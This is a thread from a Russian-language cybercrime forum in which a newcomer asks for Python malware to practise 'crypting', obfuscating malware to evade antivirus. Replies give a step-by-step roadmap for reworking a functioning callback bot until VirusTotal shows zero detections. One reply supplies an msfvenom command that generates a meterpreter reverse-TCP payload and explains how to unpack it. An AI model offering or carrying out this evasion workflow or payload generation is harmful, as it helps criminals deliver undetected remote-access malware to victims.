• XSS.stack #1 – первый литературный журнал от юзеров форума

Вредонос для тренировки

Jolly Roger

CD-диск
Пользователь
Реакции
1
Всем привет!
В Maldev совсем недавно, поэтому прошу поправить меня в моментах, в которых могу ошибаться.Я хочу начать работать в сфере криптования, но так как из языков программирования знаю пока только python и лишь в процессе обучения C,хотел бы попросить вас посоветовать какие-нибудь хорошие вредоносы написанные на python, которые я могу найти в открытом доступе под обфускацию.

Всем привет!
В Maldev совсем недавно, поэтому прошу поправить меня в моментах, в которых могу ошибаться.Я хочу начать работать в сфере криптования, но так как из языков программирования знаю пока только python и лишь в процессе обучения C,хотел бы попросить вас посоветовать какие-нибудь хорошие вредоносы написанные на python, которые я могу найти в открытом доступе под обфускацию.

Пожалуйста, обратите внимание, что пользователь заблокирован
1) Посмотри исходники разных крипторов
2) Посмотри все статьи на тему крипта
3) Возьми любой вредонос у которого стата 71 из 71 на вирустотале, например какого нибудь бота который отстукивается в админ панель и проверь его работает ли он или нет? Если он работает отлично. Эксперименты будешь проводит на нём.
4) Начни криптовать этот вредонос, после крипта проверяй не сломался ли вредонос и отстукивается ли он в админку. (это к слову о том, чтобы крипт не сломал функционал вредоноса)
5) Улучшай алгоритм криптования пока не станет 0 детектов.

p.s.
Как сказали выше на github всё уже есть.

1) Посмотри исходники разных крипторов
2) Посмотри все статьи на тему крипта
3) Возьми любой вредонос у которого стата 71 из 71 на вирустотале, например какого нибудь бота который отстукивается в админ панель и проверь его работает ли он или нет? Если он работает отлично. Эксперименты будешь проводит на нём.
4) Начни криптовать этот вредонос, после крипта проверяй не сломался ли вредонос и отстукивается ли он в админку. (это к слову о том, чтобы крипт не сломал функционал вредоноса)
5) Улучшай алгоритм криптования пока не станет 0 детектов.

p.s.
Как сказали выше на github всё уже есть.
Благодарю за роудмап

Для питона как пример можно взять исходник meterpreter из metasploit`a. RAT проверенный временем и детектиться 140 из 70 на VT :))))
Исходник на питоне генерируется из msfvenom (из терминала линукс):

Код:
msfvenom -p python/meterpreter_reverse_tcp lhost=127.0.0.1 -lport 4444 -f python -o meter.py

Исходник будет сжат zlib и криптанут base64. Сделаешь обратную операцию и исходник питоновский как на ладони даже с коментами

Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх